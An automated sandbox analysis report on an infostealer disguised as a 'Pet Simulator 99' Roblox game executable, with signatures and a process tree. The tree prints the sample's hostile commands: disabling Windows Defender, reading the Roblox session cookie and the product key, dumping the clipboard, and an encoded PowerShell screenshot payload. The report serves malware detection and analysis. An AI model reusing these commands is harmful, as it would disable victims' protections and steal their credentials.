Resubmissions

10/05/2024, 16:18

240510-tr6vcshf36 8

10/05/2024, 15:44

240510-s6vj7sdc4x 8

Analysis

  • max time kernel
    250s
  • max time network
    251s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10/05/2024, 16:18

General

  • Target

    [🚪BACKROOMS] Pet Simulator 99!.exe

  • Size

    8.5MB

  • MD5

    049690a7ad5481a5615d3943700795cb

  • SHA1

    185cb4020b9eda09d2ac9b4caa7f6493f7072b80

  • SHA256

    b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2

  • SHA512

    465027b5bf59517f0a696fcddd5b6dea59e49e5de8d784f135d1f8134f0550ea39813b94e88637481683822db37b3f965e55fddecb6b432ba1afff7f48fa947f

  • SSDEEP

    196608:6hZyegQA1HeT39IigwdeE9TFa0Z8DOjCdylLhYMfXfQSZ//OoZ:agp1+TtIiFUY9Z8D8CcldlvoMjZ

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe
    "C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe
      "C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4116
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3708
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1488
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3452
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4704
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4948
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3816
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2952
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1556
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1192
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1056
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3164
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
              PID:2240
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3632
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:3544
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2748
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.cmdline"
                5⤵
                  PID:2312
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8916.tmp" "c:\Users\Admin\AppData\Local\Temp\wk133bt4\CSCFF828B6DEEF482799C0DE4D8EFA6D40.TMP"
                    6⤵
                      PID:1972
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3720
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:412
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3280
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3756
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2560
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3360
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1908
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:3056
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:3844
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:3516
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:2316
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3908
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:636
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3896
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:4536
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:4132
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                    3⤵
                                      PID:5112
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic os get Caption
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3664
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                      3⤵
                                        PID:2136
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic computersystem get totalphysicalmemory
                                          4⤵
                                            PID:1528
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          3⤵
                                            PID:4552
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              4⤵
                                                PID:3944
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                              3⤵
                                                PID:5048
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:768
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                3⤵
                                                  PID:4884
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    4⤵
                                                    • Detects videocard installed
                                                    PID:4492
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                  3⤵
                                                    PID:3412
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2584
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                1⤵
                                                • Enumerates system info in registry
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:4920
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffb3491ab58,0x7ffb3491ab68,0x7ffb3491ab78
                                                  2⤵
                                                    PID:4072
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:2
                                                    2⤵
                                                      PID:792
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
                                                      2⤵
                                                        PID:768
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2184 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:8
                                                        2⤵
                                                          PID:4600
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1
                                                          2⤵
                                                            PID:3748
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3164 --field-trial-handle=1772,i,10791939981844242571,9520471113663904357,131072 /prefetch:1
                                                            2⤵
                                                              PID:4884
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
